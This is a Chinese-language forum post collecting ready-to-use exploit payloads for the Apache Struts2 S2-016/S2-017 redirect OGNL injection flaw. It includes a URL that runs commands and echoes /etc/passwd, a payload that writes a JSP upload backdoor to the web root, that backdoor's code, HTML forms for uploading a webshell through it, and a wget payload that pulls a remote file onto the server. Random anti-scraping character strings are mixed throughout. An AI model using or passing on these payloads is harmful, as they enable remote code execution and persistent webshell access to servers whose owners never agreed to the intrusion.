Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。
* ^( j* }( T6 e1 K* a
喜欢就点一下感谢吧^_^
3 u. E: R' N* E( G
带回显命令执行：
( h8 v5 O8 G% {5 c+ W& {7 `
4 ?9 z- }) a* q1 p  e) }5 Ahttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

7 b7 E0 U2 p, n( w# ?


( ~$ R* A/ Q/ c" [  y& b3 c  |
0 t( y6 r& ~' W: ~- v
9 H7 H. c+ W% j( Z- Y
爆路径：
) N; Z7 R& v* n! O6 _
http://www.example.com/struts2-b ... 8%29.close%28%29%7D

( S  f" S6 f" N' D



, ^, v7 T) z2 n# e$ d写文件：

, x# l$ y7 U1 |, e+ Yhttp://www.example.com/struts2-blank/example/X.action?redirect:${
$ d8 V6 m2 r, W7 H" r- x
2 X, k3 V- d! D1 j+ m%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),

%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),

8 ^% H6 D) u5 z& j! snew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
# a' m, g6 W5 I

; G; p  T) l( \7 R# ]
( R* b: F7 w3 f6 e写入的文件内容：

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      

/ o: X; r0 M4 n) R5 b/ C) u. L其实就是一个jsp的小马，需要客户端配合                                                                                 
6 y  d% ^2 K& i, U" F; v, |
' x# C& x$ D1 K函数f是文件名，t是内容
$ d& g# q- _3 q+ K6 p8 x5 L( z
客户端：
' j  ?1 A# h: _- E" d0 J' {
) N* x" j: h- S9 I; [$ Z. V  v<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
" T: A2 N! X8 G- L8 A7 n
7 n6 B+ `+ B# _9 h<textarea name=t cols=120 rows=10 width=45>your code</textarea>

4 E1 t, w; p; F<center>
. b4 k2 S: j3 E
0 G. ~) X4 [& ?* Y. [

<input type=submit value="提交">

1 X5 ?% _1 o1 G/ G+ ~</form>
- [/ p9 v! C4 _8 l
就在当前目录建立一个fjp.jsp
; r  z, J, z1 k$ ?2 b' h
shell：http://www.example.com/struts2-blank/example/fjp.jsp
+ w% D& j! T& g( b" y

; T: W% j( ^$ W% o. _8 Q" n$ k; B& b
还有@园长的一个客户端：

# i1 e5 {1 u2 P4 P. N% l7 w9 ^<html>

<head>
) {5 l, J9 ]; {. k8 Q, K
) F: b  E2 G+ ^. j* C. p) p5 a<meta http-equiv="content-type" content="text/html;charset=utf-8">

<title>jsp-园长</title>

</head>

<style>
4 ~0 W) Z9 q: y; t3 I3 p2 g
% F) l) H. B. e. s: S.main{width:980px;height:600px;margin:0 auto;}
' A0 a& f1 Z( n- l8 Q4 m: f
.url{width:300px;}

7 k; q  i5 N' E5 k) g8 v6 }.fn{width:60px;}

1 \) M" q" }) @8 b.content{width:80%;height:60%;}

</style>
6 \# ]8 G* k& B7 ^
<script>
5 c, Z! Z' M; W
  function upload(){

    var url = document.getElementById('url').value,

      content = document.getElementById('content').value,

      fileName = document.getElementById('fn').value,
2 p* `7 W8 m8 I' b7 d; d
* F6 _' S$ V* j. j/ l: s      form = document.getElementById('fm');
* k1 @8 }  j9 m7 G! X; u+ x
  ?/ C1 G: J! n5 [$ S! N3 a+ _    if(url.length == 0){

      alert("Url not allowd empty!");

      return ;

    }

    if(content.length == 0){
' ~9 F* `) p+ T" D6 {
) h( |3 ?4 O' R0 U; R# M      alert("Content not allowd empty!");
; n! m- z, k" M0 V) \! U3 {
, r- s' h5 x) I8 n9 S      return ;
, B& a& c* I5 O' j" [$ N  z
: {4 E- T) m4 V$ t# t' D4 Z) Q    }
3 P7 @# \1 |7 a* b1 S& m
. j7 D3 n; w6 t! v    if(fileName.length == 0){

4 ~: N& l5 S! o& Z' \      alert("FileName not allowd empty!");

      return ;

    }
; \% ^: j, r5 a- B1 ~) G
    form.action = url;

( Y$ G" w  }8 b2 K    form.submit();

: e: V, S! H  T1 c3 p2 G  }
" F; D" R! i1 @8 P8 z0 o
</script>

6 F- u3 M$ ~: g$ _<body>

<div class="main">
* e6 F, G6 m4 W1 V1 E/ G4 N  ^
( u; a$ w, G. k1 P  <form id="fm" method="post">  

    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  

0 J9 H3 z% k5 ~: o2 D: v! K$ t    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  

    <a href="javascript:upload();">Upload</a>
. _* _  H2 N3 j' R

7 F. @2 P& n  @2 V3 A
    <textarea id="content" class="content" name="t" ></textarea>

- X; ]% H! k6 l" {  </form>
* _- |  Z1 b0 X
</div>
$ a" c6 f1 I6 m; P) O; X7 w+ E0 ~  @
: r4 r7 m. J3 V3 n, j</body>

) i' w, \1 a2 w</html>

- j$ h) U8 e' g

* {$ L/ P$ I5 D还有@X发的一个wget的getshell
1 _; [: A3 W, H! ^' v
6 ]" m8 M  G. o2 H2 u# x?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
复制代码